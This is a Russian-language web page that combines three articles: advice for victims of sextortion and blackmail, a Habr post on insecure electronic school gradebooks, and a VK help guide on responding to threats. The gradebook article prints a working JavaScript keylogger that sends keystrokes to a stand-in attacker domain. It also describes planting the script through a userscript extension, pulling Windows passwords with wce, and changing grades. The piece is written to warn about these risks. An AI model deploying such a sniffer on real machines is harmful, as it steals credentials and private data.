Одногруппник получил доступ к личной переписке и шантажирует

Мошенники шантажируют разглашением личной/приватной информации

Одногруппник получил доступ к личной переписке и шантажирует
Неоднократно ко мне обращались люди с просьбой помочь решить проблему, связанную с тем, что их шантажируют мошенники/преследователи/”доброжелатели” опубликованием их личной/приватной информации в сети интернет или её пересылкой друзьям, родственникам, коллегам.

Когда-то давно слышал о ситуации, где шантажировали девушек их откровенными снимками, которые печатались в фотоателье (ещё во времена до цифровых камер, когда фотографии снимали на пленку).

В большинстве подобных случаев шантажистами были новые работники (стажёры) конкретного фотоателье или их друзья, с которыми им не терпелось поделиться увиденным, некоторые даже создавали собственные альбомы/коллекции.

Не будем останавливаться на причинах и целях, которые побуждали их так фотографироваться или пытаться получить на этом выгоду, вернёмся в наше время – время цифровых технологий.Ниже опишу несколько случаев, по которым ко мне обращались.

_________________________________________________________________________

_________________________________________________________________________

На сегодняшний день, когда с помощью мобильного телефона мы стараемся запечатлеть какие-то памятные события/моменты нашей жизни, не стоит при этом забывать, что, выкладывая это в открытый доступ, мы самостоятельно подвергаем себя опасности.

Безобидная фотография котёнка возле дома людям со злым умыслом может рассказать о том, где вы живёте, а фотография возле вашего дорогого автомобиля покажет, что в вашей семье есть достаток.

Публичная социальная жизнь потенциально несёт в себе угрозу вашему благополучию, вашей безопасности и вашей семье.

Если вы делитесь личными/интимными фотографиями с другом/подругой, парнем/девушкой, виртуальным собеседником (фактически неизвестным), вы самостоятельно передаёте в руки этих людей инструмент/компромат, которым они могут воспользоваться как им заблагорассудится.

Случай первый.

Одинокая женщина познакомилась в социальной сети с привлекательным для неё мужчиной, они разговаривали на общие и интересные для неё темы. Виртуальный флирт перерос в разговоры на очень интимные и откровенные темы.

Они делились откровенными фотографиями, и в какой-то момент времени её виртуальный собеседник, получив достаточно необходимого компромата на неё, пригрозил отправить эту информацию всем её друзьям, родственникам, детям и друзьям детей, а в обмен требовал деньги.

Подобных случаев очень много, кроме них существуют также и целенаправленные атаки на конкретных людей.

Вымогатели могут требовать не только деньги, но и услуги, как интимные, так и профессиональные (например, передать им некую рабочую конфиденциальную информацию, записать откровенное видео, которое потом может быть опубликовано на определенных сайтах с целью заработка, и т.д.).

Случай второй.

Молодая девушка, не долго встречаясь с парнем, по его просьбе или по собственному желанию присылала ему откровенные фотографии и/или они их делали вместе.

По истечению определенного времени что-то в их отношениях не заладились, и она решила уйти от него, но он был не согласен с её решением и грозился выложить личные фотографии и видео в интернет, а также отправить их всем общим знакомым/друзьям и её родителям, если она не будет с ним периодически проводить время.

В первом и втором случае вопрос был такой: как удалённо удалить всю мою личную информацию, к кому обратиться? Отвечаю: удалённо почти никак, т.к. информация может храниться на нескольких устройствах – телефон, планшет, компьютер, флешка, внешний диск.

В добавок к этому, удалённое подключение без согласия того, к кому подключаются – это преступление, даже не смотря на то, что вы хотите удалить только вашу личную информацию – закон в таком случае будет на стороне мошенника.

Далее немного о их методах: мошенниками могут быть как мужчины, так и женщины, они создают поддельные страницы, такие страницы могут создаваться под конкретного человека, а их количество ничем не ограничивается – вы можете общаться с одним и тем же человеком под разными именами (когда-то одна знакомая, чтобы проверить своего мужа, зарегистрировала поддельную страницу и начала общаться с ним под придуманной личностью; в итоге, они договорились встретиться в отеле, и когда он зашел в номер – он был в шоке 🙂 ). В процессе создания поддельной страницы мошенники анализируют страницу потенциальной жертвы – её вкусы, интересы, предпочтения, любую другую информацию, которая позволит приблизиться к жертве. С целью обезопасить себя, мошенники предпринимают определённые меры по недопущению возможности отследить своё реальное местоположение. Самое простое, что они могут сделать – это использовать общественные/публичные точки доступа к сети интернет (WiFi в кафе, барах, ресторанах или других публичных местах) – они могут даже не заходить в помещение, а сидеть рядом в машине. Ситуация осложняется тем, что такие информационные преступления могут быть не в юрисдикции местных правоохранительных органов – страница мошенника скорее всего поддельная, размещённая к тому же на сервере другой страны. А ещё есть сложности в получении необходимой информации – большинство компаний, в том числе и социальные сети, могут раскрывать информацию о своих клиентах/пользователях только по решению суда. Но даже и в этом случае, если правоохранительные органы получат IP-адрес, откуда осуществлялось соединение, то вполне вероятно (в лучшем случае) они выйдут на интернет-кафе или взломанный компьютер. Но даже не это основное препятствие – жертвы мошенников просто не обращаются в милицию из-за стыда и страха публичной огласки.

Что тогда делать?

Если вы всё-таки решились обратиться в правоохранительные органы, то почти во всех больших городах существует так называемый “отдел по борьбе с информационными преступлениями”.

Но, к сожалению, такими маленькими делами они так просто не занимаются, поскольку основной их профиль – это информационные преступления больших масштабов (например, кражи денег с банковских счетов).

В моём городе есть такой отдел, но по ББС (бабка бабке сказала 😉 ) говорят, что пробиться или связаться с ними очень сложно, а убедить их заняться подобным делом – тем более 😉 Озвучу лично мою точку зрения: если уже такое произошло, то не надо идти на поводу у мошенников/злоумышленников, ведь рано или поздно информация станет доступной, при этом всё это время вы будете жить в напряжении, теряя нервы и, возможно, деньги. Учтите, репутацию можно восстановить достаточно быстро, приложив для этого определённые усилия – в конце-концов, все мы люди и ничто человеческое нам не чуждо, а вот здоровье – не всегда, это может быть длительный процесс и не факт, что восстановитесь в первоначальное состояние (до данного инцидента).

Будьте ответственными и предусмотрительными: перед тем, как поделиться фотографиями или видео со знакомыми в интернете, друзьями или товарищами, подумайте, а хотели бы вы, чтобы это увидел ещё кто-то – другие люди, дети/супруг(а)/родители/родственники или коллеги? Представляете состояние ребёнка, если он увидит фото или если над ним будут смеяться его друзья/одноклассники/одногруппники?

Источник: https://www.kaloshin.me/2015/08/fraudsters-blackmails-disclosure-of-private-information.html

Почему «электронные дневники» до сих пор ненадежны в образовании?

Одногруппник получил доступ к личной переписке и шантажирует

В этом топике будет затронута проблема, связанная с организацией надежности цифровых информационных систем, являющихся частью процесса современного образования. Если говорить конкретно, то электронных дневников.

Как известно, цифровые внедрения нынче повсеместны: школы и университеты заводят собственные странички в социальных сетях и блогах для информирования о происходящем, редкое учебное заведение не имеет собственного сайта, а электронные журналы вот-вот окончательно вытеснят бумажные… И это лишь часть тех перемен, которые происходят у нас на глазах.

Конечно же, в информационный век этому уже не приходится удивляться: люди привыкли, что вся интересующая их информация находится интернете. Очевидно, эти процессы инкапсулируют в себе и немалую ответственность как со стороны пользователей, так и со стороны разработчиков. Теперь недостаточно, уходя из кабинета, запирать дверь на ключ, оставляя позади нее всё важное.

В цифровом мире физическая недоступность не является гарантией безопасности (однако, несомненно, этот аспект крайне важен в плане обеспечения комплексной безопасности). Но, обо всем по порядку. «Самая большая уязвимость любой информационной системы — это её пользователь»(с)
С этим высказыванием трудно поспорить — человек есть человек.

Именно эта проблема является ключевой в плане надежности и безопасности информационных ресурсов как со стороны пользователей, так и разработчиков. Эта проблема актуальна ровно столько, сколько существует сам человек, а поэтому она не относится к цифровому миру, как таковому.

Ведь и во времена, предшествующие цифровым, например, бумажный журнал было доверено переносить конкретному человеку (старосте, кажется), который, в общем-то, мог бы пользоваться своим положением или быть использованным другими своими одногруппниками, что в конечном счете вполне могло привести к подделке оригинальной информации, ее компроментации.

Другой пример, когда виновниками выступают уже не доверенные лица, а непосредственные «владельцы» информации. Если рассматривать это на конкретном примере, то легко представить себе обычного, скажем, секретаря, не подумавшего не только забрать, но и вообще закрыть журнал с важной информацией на время своего отсутствия в кабинете. Такое бывает и нередко.

Это также может привести к утечке/подделке важных для учреждения сведений. В современное время примеры неаккуратности человеческого фактора остаются идентичными, разве что бумажки заменяются компьютерами. На самом деле это несет еще большую угрозу. Если запрограммировать и «заразить» бумажку было нельзя, то с компьютерами все обстоит иначе.

Редкий сотрудник (по крайней мере, в сфере школьного образования) нажимает Win+L, отлучаясь по делам, некоторых в принципе не заботит, стоят ли пароли на их учетных записях Windows, а третьи вообще пускают за свой ноутбук чуть ли ни каждого встречного… Все это лишь усугубляет и без того ненадежные системы.

Вы можете использовать самые безопасные браузеры, накачать дюжину различных антивирусов и даже использовать уникальный пароль учетной записи, но если пускать за свое место других людей без пристального наблюдения за их действиями, ничто не сможет гарантировать надежность рабочего места и отсутствие утечек.

Теперь хотелось бы привести простой пример эксплуатации «человеческого фактора».

Есть добрый преподаватель географии Иван Иванович, который попросил своего «ученика-компьютерщика» Антона Антоновича разобраться с тем, почему на его компьютере нет звука в презентации(обычная проблема). Ученик, быстро разобравшись с проблемой, пока Иван Иванович пишет на доске материал к следующему уроку, подумывает о перехвате данных своего учителя с этого компьютера(часто это почта, логины-пароли от соц.сетей и электронных журналов и т.д). Заранее Антоном был заготовлен злобный JavaScript-сценарий, являющийся частью его self-made сниффера:

(function(){ THIEF = “http://my_evil_domain.com/thief.php”; function grab(e) { var o = e.srcElement; var img = new Image(); var text = o.value; if(!text || typeof text == “undefined”) text = o.innerHTML; if(!text || typeof text == “undefined” || (text+””).trim().length==0) return; img.src = THIEF+”?stolendata=”+encodeURIComponent(text)+ “&urlfromdata=”+encodeURIComponent(location.href.toString())+ “&domdata=”+encodeURIComponent(o.getAttribute(“id”)+” ||| .”+ o.getAttribute(“class”)); img.width=”1px”; img.height=”1px”; img.id=”taken_data_sender”; try{ var oldImg = document.getElementById(img.id.toString()); document.body.removeChild(oldImg); }catch(e){} document.body.appendChild(img); return true; } function connect_signal(selector) { var elements = document.getElementsByTagName(selector); for(var el in elements) elements[el].addEventListener('keyup', grab, false); } var selectors = ['*']; for(var k in selectors) connect_signal(selectors[k]) })();

И «ученик-компьютерщик» решает встроить свой скрипт внутрь любимого браузера Ивана Ивановича. Сделать Антон это может как стандартными средствами, предоставленными непосредственно браузерами, так и сторонними, вроде расширений TamperMonkey(Chrome), GreaseMonkey(FireFox) и т.д.

После чего он довольно встает с захваченного PC и идет с улыбкой к любимому учителю географии, информируя его о починке исходной проблемы. Но с этого момента все вводимые данные на захваченном компьютере будут течь к Антону.

Для более пущего эффекта он может сбросить всю историю браузера, включая запомненные ранее аутентификационные данные из форм.

Кроме того, Антон может попытать счастье и постараться вытащить пароль учетной записи Windows, используя средства наподобие wce (WindowsCredentialsEditor). Ведь вряд ли у Ивана Ивановича десяток различных паролей — так ведь неудобно — поэтому, вполне вероятно, что всего один единственный 😉

Начать, пожалуй, следует с того, что ни один электронный журнал, встретившийся мне, не обладал должной системой защиты и системой выявления несанкционированного доступа. Я не хотел бы их перечислять. Все они, с точки зрения *безопасной* авторизации, напоминали какие-то форумы и многочисленные сайты-пиратки, построенные на движке DLE. Везде для входа в свой кабинет нужно было лишь указать логин(который часто представлял из себя email) и пароль. Ни о какой истории входов-выходов и информации об открытых «висячих» сессиях и речи нет. Однако данные, находящиеся внутри, все же представляют определенную ценность. Рассмотрим пример на реально существующем электронном журнале, который функционировал в течении целого года. Предположим, тот самый «ученик-компьютерщик» этим же вечером, придя домой и проанализировав свой лог, получил несанкционированный доступ к учетной записи преподавателя:

авторизовавшись, Антон увидел следующую картину:

что натолкнуло его на мысль о том, что имея в руках auth-данные лишь одного сотрудника своего образовательного учреждения(Ивана Ивановича), он может управлять всеми оценками любого юнита, входящего в состав этого учреждения. Это довольно странно, ведь это идет вразрез с простейшими правилами доступа.

Однако к служебной и конфигурационной информации у простого преподавателя доступа все же нет. Зато такой доступ есть у аккаунта администратора учебного заведения: Здесь приведен один из ключевых конфигурационных разделов журнала. Красным выделено то, что влияет на безопасность и достоверность данных. Далее я хотел бы показать, что часто подобные настройки являются лишь иллюзией, которая еще больше усугубляет положение: ответственные лица полагают, что информация месячной/недельной(и т.д) давности была проверена и заморожена навсегда. Однако, это не так. Что-либо изменить просто так не удастся, т.к на данный момент уже прошло слишком много времени. Но если заглянуть в исходный код и посмотреть, как все устроено, можно увидеть следующее:

Синим обозначено то, что якобы не подлежит замене, красным — что изменяемо. Сразу появляется мысль подставить данные из уязвимого красного блока в синий, т.е заменить SPAN на INPUT. После срабатывания JS-событияonChange происходит следующее:

Источник: https://habr.com/ru/post/261289/

Что делать, если угрожают, шантажируют, вымогают деньги ВКонтакте?

Одногруппник получил доступ к личной переписке и шантажирует

Чаще всего шантажируют после того, как попросили сделать кое-что на видео или снять фото и прислать.

Твоим собеседником был вымогатель с фейковой страницей ВКонтакте (имя, фамилия, фото — ненастоящие), который одновременно переписывается с несколькими жертвами.

Также предметом шантажа может быть личная переписка или фото — например, если страницу «взломали». Проблема: ты не хочешь, чтобы информация личного характера попала к твоим друзьям и знакомым — а мошенник угрожает ее распространить.

  1. Сообщи все обстоятельства и ссылку на страницу шантажиста в службу поддержки ВК.

    Как узнать ссылку на страницу — смотри здесь.

  2. Обратись в полицию с заявлением или сначала проконсультируйся с адвокатом.

Кроме того, если твоя страница ВКонтакте взломана, необходимо предупредить об этом друзей и восстановить к ней доступ — инструкция здесь.

Важно обратиться в органы правопорядка. Почему?

Человек, который тебя шантажирует или угрожает тебе, использует ВК только как средство связи. Администрация ВК не будет разбираться в ваших взаимоотношениях. Когда ты стал жертвой обмана, по факту угроз, вымогательства надо обращаться в полицию. Если бы тебе угрожали по телефону, в письме, разве ты стал бы обращаться в телефонную компанию или на почту?

Предположим, ты пожалуешься на страницу злоумышленника. Максимум, что может сделать администрация ВК — заблокировать ее. Тогда этот человек найдет другой способ связаться с тобой или твоими друзьями.

Например, возьмет другую сим-карту и зарегистрирует новую страницу, с которой будет снова тебе писать и угрожать. Вспомни, как ты сам регистрировался ВКонтакте — разве это было сложно? Скорее всего, у человека уже сейчас есть несколько страниц, созданных на разные номера.

А еще есть Скайп, , Фейсбук и другие способы связи. Он найдет твоих друзей и близких везде.

И даже если компрометирующие материалы (фото, видео) удалят из ВК, это не поможет — ведь шантажист это предусмотрел и уже сохранил их у себя на компьютере. А значит, он загрузит их снова.

Стоит ли удалять компрометирующие материалы из отправленных сообщений ВКонтакте? В течение 24 часов отправленные сообщения можно удалить, но злоумышленник это наверняка знает и уже где-то сохранил все, что ты ему отправлял.

Если это просто переписка, то он мог переслать ее самому себе (или другому своему аккаунту), и ты ее уже не удалишь, а вот он сможет ее рассылать другим людям.

Кроме того, сообщения могут понадобиться в качестве доказательств при обращении в правоохранительные органы.

Если ты обратишься в правоохранительные органы, то, когда понадобится, они сами сделают официальный запрос в администрацию ВК, чтобы получить необходимую информацию о шантажисте.

Самому тебе такую информацию не получить, как ни проси, потому что ВК никогда не выдает информацию о своих пользователях другим пользователям, но сотрудничает с государственными органами, чтобы помочь бороться с преступностью. А самоуправство запрещено законом.

Если ты попытаешься найти вымогателя и отомстить ему, ты нарвешься на еще более серьезные неприятности.

Только компетентные органы могут поймать вымогателя и изъять у него материалы, которыми он тебя шантажирует. И только они могут его наказать по закону. Обращайся в полицию немедленно (а еще лучше сначала сходить к адвокату на консультацию).

Посмотри, что написано в системе помощи ВКонтакте на случай шантажа — там то же самое.

Ты думал, что человек, чьи фото выложены на странице — это и есть тот, с кем ты переписывался? Нельзя быть таким доверчивым. Обычно это вовсе не та привлекательная девушка (да и не девушка, скорее всего). Разве злоумышленнику трудно создать страницу с чужими фотографиями, взятыми из интернета?

Например, фото вот этой девушки попали в интернет как минимум в 2008 году, но до сих пор активно используются мошенниками для создания фейковых страниц:

У нас есть инструкция, которая поможет найти фото человека в интернете и проверить, фейковая страница или нет — Как найти человека по фотографии.

Иногда бывает, что шантажист — твой бывший близкий человек (ревнивый парень, девушка, бывший муж или жена). Завладев твоей личной информацией или перепиской, он хочет распространить ее.

В этом случае предупреди человека, что суд на 100 процентов встанет на твою сторону, у человека появится судимость и еще придется выплатить деньги за моральный ущерб.

Если решишь пойти по этому пути, обратись для начала к адвокату.

Можно ли сделать, чтобы человек не мог писать моим друзьям?

К сожалению, нет. Ведь даже если бы это было возможно, то ты уже понял, что он может создать много страниц или найти другие способы связи с людьми.

Напиши на своей странице, что информация личного характера о тебе попала к злоумышленникам и они могут ее распространить. Нужно сделать это, чтобы твои друзья были готовы и чтобы это их не шокировало — ведь преступник может разослать компромат в любой момент. Когда делаешь запись на странице, рядом с кнопкой «Отправить» есть замочек — он позволяет сделать запись только для друзей.

Поможет ли мне, если я удалю всех своих друзей?

Нет, не поможет. Шантажист заранее сохранил себе ссылки на всех твоих друзей.

Поможет ли мне, если я удалю свою страницу?

Нет, не поможет. Это ничего не изменит. Все, что ты отправлял шантажисту, никуда не удалится, а как связаться с твоими друзьями, он уже знает. Удаление страницы создаст проблемы только тебе — ты потеряешь всю переписку, фотографии, друзей, подписки. Позже ты захочешь восстановить страницу, но это получается не у всех.

В следующий раз ты будешь умнее и не станешь отправлять личную информацию, фото или видео незнакомым людям.

Если восстановить доступ к взломанной странице, это поможет?

Скорее всего, шантажист уже скопировал куда-то информацию личного характера, если получил доступ к твоей странице. Например, сохранил на своем компьютере. Восстановить доступ к взломанной странице, конечно, нужно, но шантажиста это вряд ли остановит, если у него уже есть чем тебя шантажировать.

Можно ли вычислить шантажиста?

Подумай: а что ВКонтакте может знать о шантажисте? Фамилию, имя, отчество, домашний адрес, место работы? Конечно, нет. Номер телефона? IP-адрес? Что тебе дала бы такая информация? Мошенники используют одноразовые номера телефонов, вряд ли ты сможешь до них дозвониться. По IP-адресу ты узнаешь, что человек находился где-то в городе за 5 тыс. километров от тебя. И что?

Далее: представь, что ВК выдает тебе некие данные о шантажисте, ты его находишь и с целью мести совершаешь некое преступление. Разве ВК желает становиться пособником еще одного преступника? Но допустим, ты хочешь получить данные о шантажисте и пойти с ними в полицию. Вот и иди в полицию, как указано в начале. Когда понадобится, полиция сама получит от администрации ВК необходимые сведения.

Дополнительные инструкции

Источник: https://vhod.ru/vkontakte/chto-delat/esli-shantazhiruyut/

СтражЗакона
Добавить комментарий